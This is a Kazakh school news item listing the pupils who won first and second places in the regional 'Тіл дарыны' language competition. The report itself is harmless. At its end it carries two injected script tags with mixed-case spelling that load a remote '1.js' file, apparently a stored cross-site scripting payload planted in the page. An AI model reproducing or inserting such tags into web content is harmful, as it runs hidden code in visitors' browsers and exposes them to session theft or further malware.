«Тіл дарыны» облыстық конкурсының жеңімпаздары Ағымдағы жылдың 16 ақпан күні 8-11-сынып оқушылары арасында «Тіл дарыны» облыстық конкурсы өтті. Конкурстың мақсаты - қазақ, орыс, ағылшын тілдерін жетік меңгерген оқушыларды анықтап, қолдау, тілді меңгеруге деген қызығушылықтарын ынталандыру, тіл мәдениетін жетілдіру. Облыстық конкурсқа мектепішілік кезеңінде I орынға ие болған 4 оқушы қатысты. Олар Ким Камила 8 «Б» , Балсеит Елдана, 9 «В» сынып, Жұматай Саяна 10 «А» және Байсеитова Айжан 11 «А» сынып оқушылары. Конкурстың нәтижесі: Байсеитова Айжан – I орын Жұматай Саяна – II орын Балсеит Елдана - II орын Ким Камила - II орын Жеңімпаз оқушылар конкурстың қазылар алқасы шешіміне сәйкес I, II дәрежелі дипломдармен марапатталды.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>